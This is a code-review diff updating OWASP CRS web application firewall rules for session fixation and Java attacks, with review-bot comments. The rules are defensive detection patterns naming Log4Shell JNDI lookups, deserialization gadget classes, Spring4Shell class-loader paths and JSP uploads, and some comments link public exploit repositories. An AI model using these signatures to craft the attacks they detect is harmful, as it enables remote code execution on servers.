@@ -42,11 +43,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|cfid|cftoken|cfsid|jservsession|jwsession)$" \ @@ -54,9 +54,9 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,\ + t:none,t:lowercase,\ msg:'Possible Session Fixation Attack: SessionID Parameter Name with Off-Domain Referer',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{TX.943110_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ 
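Review bot: `logdata:'Matched Data: %{TX.0} found within %{TX.943110_MATCHED_VAR_NAME}: %{MATCHED_VAR}'` now names the ARGS_NAMES variable saved by the parent rule (the `setvar:'tx.943110_matched_var_name=%{matched_var_name}'` is in the next hunk), but `%{MATCHED_VAR}` and `%{TX.0}` are, as far as I can tell, resolved once the chain completes, so the log line will pair the session-parameter name with the Referer host captured by the chained `@rx ^(?:ht|f)tps?://(.*?)/`. If a coherent log entry is the goal, store the value alongside the name, e.g. `setvar:'tx.943110_matched_var=%{matched_var}'` in the parent and `%{TX.943110_MATCHED_VAR}` in logdata. The same pattern is used for 943120 (`TX.943120_MATCHED_VAR_NAME`) in the hunks at `@@ -81,9 +81,9 @@` and `@@ -91,37 +91,37 @@`, where `%{MATCHED_VAR}` will be the header count from `&REQUEST_HEADERS:Referer "@eq 0"`. Dropping `t:urlDecodeUni` from an `ARGS_NAMES` rule appears correct since ModSecurity already decodes argument names, but a one-line comment would help, as it reverses the 3.3 behaviour.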
@@ -64,16 +64,16 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.943110_matched_var_name=%{matched_var_name}',\ chain" - SecRule REQUEST_HEADERS:Referer "@rx ^(?:ht|f)tps?://(.*?)\/" \ + SecRule REQUEST_HEADERS:Referer "@rx ^(?:ht|f)tps?://(.*?)/" \ "capture,\ chain" SecRule TX:1 "!@endsWith %{request_headers.host}" \ "setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsession|phpsessid|weblogicsession|session_id|session-id|cfid|cftoken|cfsid|jservsession|jwsession)$" \ @@ -81,9 +81,9 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio phase:2,\ block,\ capture,\ - t:none,t:urlDecodeUni,t:lowercase,\ + t:none,t:lowercase,\ msg:'Possible Session Fixation Attack: SessionID Parameter Name with No Referer',\ - logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + logdata:'Matched Data: %{TX.0} found within %{TX.943120_MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-multi',\ tag:'platform-multi',\ 
@@ -91,37 +91,37 @@ SecRule ARGS_NAMES "@rx ^(?:jsessionid|aspsessionid|asp\.net_sessionid|phpsessio tag:'paranoia-level/1',\ tag:'OWASP_CRS',\ tag:'capec/1000/225/21/593/61',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ + setvar:'tx.943120_matched_var_name=%{matched_var_name}',\ chain" SecRule &REQUEST_HEADERS:Referer "@eq 0" \ "setvar:'tx.session_fixation_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943013,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:943014,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943015,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:943016,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # -# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently 
high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943017,phase:1,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:943018,phase:2,pass,nolog,skipAfter:END-REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION" # -# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # diff --git a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf index 8ae32e13bd..b8b6d1e323 100644 --- a/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf +++ b/rules/REQUEST-944-APPLICATION-ATTACK-JAVA.conf @@ -1,8 +1,9 @@ # ------------------------------------------------------------------------ -# OWASP ModSecurity Core Rule Set ver.3.3.0 +# OWASP CRS ver.4.0.0 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2024 CRS project. All rights reserved. # -# The OWASP ModSecurity Core Rule Set is distributed under +# The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ 
@@ -12,10 +13,10 @@ # # Many rules check request bodies, use "SecRequestBodyAccess On" to enable it on main modsecurity configuration file. -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944011,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:944012,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # -# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # # This rule is also triggered by an Apache Struts exploit: # [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/xsscx/cve-2017-5638 ] @@ -35,7 +36,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,t:lowercase,\ - log,\ msg:'Remote Command Execution: Suspicious Java class detected',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -46,10 +46,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/137/6',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/xsscx/cve-2017-5638 ] 
@@ -69,7 +69,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,t:lowercase,\ - log,\ msg:'Remote Command Execution: Java process spawn (CVE-2017-9805)',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -80,12 +79,12 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?:unmarshaller|base64data|java\.)" \ "setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # Magic bytes detected and payload included possibly RCE vulnerable classes detected and process execution methods detected # anomaly score set to critical as all conditions indicate the request try to perform RCE. @@ -95,7 +94,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,t:lowercase,\ - log,\ msg:'Remote Command Execution: Java serialization (CVE-2015-4852)',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ 
@@ -106,13 +104,12 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ chain" SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)" \ - "t:none,t:lowercase,\ - setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + "setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ Apache Struts vulnerability CVE-2017-5638 - Exploit tested: https://github.com/mazen160/struts-pwn ] @@ -128,8 +125,7 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES "id:944130,\ phase:2,\ block,\ - t:none,t:lowercase,\ - log,\ + t:none,\ msg:'Suspicious Java class detected',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ 
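Review bot: Removing `t:none,t:lowercase` from the chained `SecRule MATCHED_VARS "@rx (?:runtime|processbuilder)"` makes this lowercase-only pattern depend on `MATCHED_VARS` carrying the parent's already-lowercased values; if that holds, which seems to be the assumption since the parent keeps `t:none,t:lowercase`, the change is a harmless cleanup, but a comment on the chained line such as `# MATCHED_VARS already holds the parent's t:lowercase output; no transformation needed here` would stop the next reader from re-adding it or from assuming the pattern is case-insensitive. The parent's `SecRule` line lies before this hunk, so I cannot confirm its transformation list here. The same question applies to 944130 in the `@@ -128,8 +125,7 @@` hunk, where `t:lowercase` is dropped from the rule itself rather than from a chain link; unless its `@rx` (outside the hunk) carries `(?i)`, mixed-case class names would stop matching there, so please confirm or add that flag.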
@@ -140,17 +136,135 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/1',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [ Java Script Uploads ] +# +# Block file uploads with filenames ending in Java scripts (.jsp, .jspx) +# +# Many application contain Unrestricted File Upload vulnerabilities. +# https://owasp.org/www-community/vulnerabilities/Unrestricted_File_Upload +# +# Attackers may use such a vulnerability to achieve remote code execution +# by uploading a script file. If the upload storage location is predictable +# and not adequately protected, the attacker may then request the uploaded +# file and have the code within it executed on the server. +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. 
+# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:jsp|jspx)\.*$" \ + "id:944140,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'Java Injection Attack: Java Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-injection-java',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + +# Log4J / Log4Shell Defense +# +# This addresses exploits against the Log4J library described in several CVEs: +# * CVE-2021-44228 +# * CVE-2021-44832 +# * CVE-2021-45046 +# * CVE-2021-45105 +# +# See https://coreruleset.org/20211213/crs-and-log4j-log4shell-cve-2021-44228/ +# +# This rule attempts to detect two things: +# * Nested use of ${ +# * use of ${jndi:... without the closing bracket +# +# Rule 932130 is also essential for defense since there are certain +# bypasses of the log4j rules that can be caught by 932130. +# +# The payload is not displayed in the alert message since log4j could +# potentially be executed on the logviewer. +# +# This rule has stricter siblings: 944151 (PL2), 944152 (PL4) +# +# Regular expression generated from regex-assembly/944150.ra. 
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 944150 +# +SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)(?:[^\}]{0,15}(?:\$|$?)(?:\{|&l(?:brace|cub);?)|jndi|ctx)" \ + "id:944150,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,t:jsDecode,t:htmlEntityDecode,\ + log,\ + msg:'Potential Remote Command Execution: Log4j / Log4shell',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/6',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/1',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +# +# -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) +# -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:944013,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:944014,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +# This is a stricter sibling of 944150. +# It is a re-iteration of said rule without the curly bracket distance limiter +# between the nested "${". This is prone to backtracking and therefore a potential +# DoS problem for backtracking regular expression engines (e.g. PCRE2), but it also avoids evasions that fill the space between the nested +# elements with arbitrary data. 
# -# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# Regular expression generated from regex-assembly/944151.ra. +# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 944151 # +SecRule REQUEST_LINE|ARGS|ARGS_NAMES|REQUEST_COOKIES|REQUEST_COOKIES_NAMES|REQUEST_HEADERS|XML:/*|XML://@* "@rx (?i)(?:\$|$?)(?:\{|&l(?:brace|cub);?)(?:[^\}]*(?:\$|$?)(?:\{|&l(?:brace|cub);?)|jndi|ctx)" \ + "id:944151,\ + phase:2,\ + block,\ + t:none,t:urlDecodeUni,t:jsDecode,t:htmlEntityDecode,\ + log,\ + msg:'Potential Remote Command Execution: Log4j / Log4shell',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/137/6',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + # [ Java deserialization vulnerability/Apache Commons (CVE-2015-4852) ] # # Detect exploitation of "Java deserialization" Apache Commons. @@ -168,7 +282,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES "id:944200,\ phase:2,\ block,\ - log,\ msg:'Magic bytes Detected, probable java serialization in use',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ 
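Review bot: The new 944140 pattern `.*\.(?:jsp|jspx)\.*$` carries a leading `.*` that an unanchored `@rx` does not need, and a trailing `\.*` that accepts trailing dots in the file name without the comment saying why; a comment such as `# Trailing dots are accepted because they may be stripped when the upload is stored (confirm)` would record the intent. For 944150 the first alternation renders here as `(?:\$|$?)`, where `$?` would be an optional end-of-string anchor; I suspect the page decoded an HTML entity (the parallel alternation uses `&l(?:brace|cub);?`), so the committed text should be checked against regex-assembly/944150.ra rather than this rendering. 944150 also lists no `REQUEST_BODY` target while the other rules in this file do; if raw-body coverage is deliberately left to the parsed-body targets, a comment saying so would stop someone from re-adding it. The hunk ends inside the introductory comment of the CVE-2015-4852 section.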
@@ -179,10 +292,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # Detecting possible base64 text to match encoded magic bytes \xac\xed\x00\x05 with padding encoded in base64 strings are rO0ABQ KztAAU Cs7QAF SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ @@ -190,7 +303,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES "id:944210,\ phase:2,\ block,\ - log,\ msg:'Magic bytes Detected Base64 Encoded, probable java serialization in use',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -201,10 +313,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ "@rx (?:clonetransformer|forclosure|instantiatefactory|instantiatetransformer|invokertransformer|prototypeclonefactory|prototypeserializationfactory|whileclosure|getproperty|filewriter|xmldecoder)" \ 
@@ -212,7 +324,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,t:lowercase,\ - log,\ msg:'Remote Command Execution: Java serialization (CVE-2015-4852)',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ @@ -223,10 +334,10 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" # This rule is also triggered by the following exploit(s): # [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] @@ -237,7 +348,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:lowercase,\ - log,\ msg:'Remote Command Execution: Suspicious Java method detected',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ 
@@ -248,17 +358,41 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES tag:'capec/1000/152/248',\ tag:'PCI/6.5.2',\ tag:'paranoia-level/2',\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + +# This rule is also triggered by the following exploit(s): +# - https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/ +# +SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_BODY|REQUEST_HEADERS|XML:/*|XML://@* \ + "@rx (?:class\.module\.classLoader\.resources\.context\.parent\.pipeline|springframework\.context\.support\.FileSystemXmlApplicationContext)" \ + "id:944260,\ + phase:2,\ + block,\ + t:urlDecodeUni,\ + msg:'Remote Command Execution: Malicious class-loading payload',\ + logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ + tag:'application-multi',\ + tag:'language-java',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/248',\ + tag:'PCI/6.5.2',\ + tag:'paranoia-level/2',\ + ver:'OWASP_CRS/4.0.0',\ + severity:'CRITICAL',\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" -SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944015,phase:1,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:944016,phase:2,pass,nolog,skipAfter:END-REQUEST-944-APPLICATION-ATTACK-JAVA" # -# -= Paranoia Level 3 =- (apply 
only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # # Interesting keywords for possibly RCE on vulnerable classes and methods base64 encoded # Keywords = ['runtime', 'processbuilder', 'clonetransformer', 'forclosure', 'instantiatefactory', 'instantiatetransformer', 'invokertransformer', 'prototypeclonefactory', 'prototypeserializationfactory', 'whileclosure'] @@ -273,7 +407,6 @@ SecRule ARGS|ARGS_NAMES|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES phase:2,\ block,\ t:none,\ - log,\ msg:'Base64 encoded string matched suspicious keyword',\ logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\ tag:'application-multi',\ 
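Review bot: 944260's pattern is case-sensitive (`classLoader`, `FileSystemXmlApplicationContext`) and the rule applies only `t:urlDecodeUni` with no `t:none`, unlike its neighbours that use `t:none,t:lowercase` with all-lowercase patterns. If the exact casing is deliberate because the framework matches these property paths verbatim, say so in the rule's comment — `# Pattern is case-sensitive on purpose: property paths are matched verbatim (confirm)` — otherwise align it with the file's convention. Without `t:none`, any transformations configured in `SecDefaultAction` are inherited in addition to `t:urlDecodeUni`, which is presumably harmless for the CRS default action but is a reason to use the same explicit `t:none` prefix as the rest of the file. The PL2 skip rules and section comment in this hunk are trivial renames.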
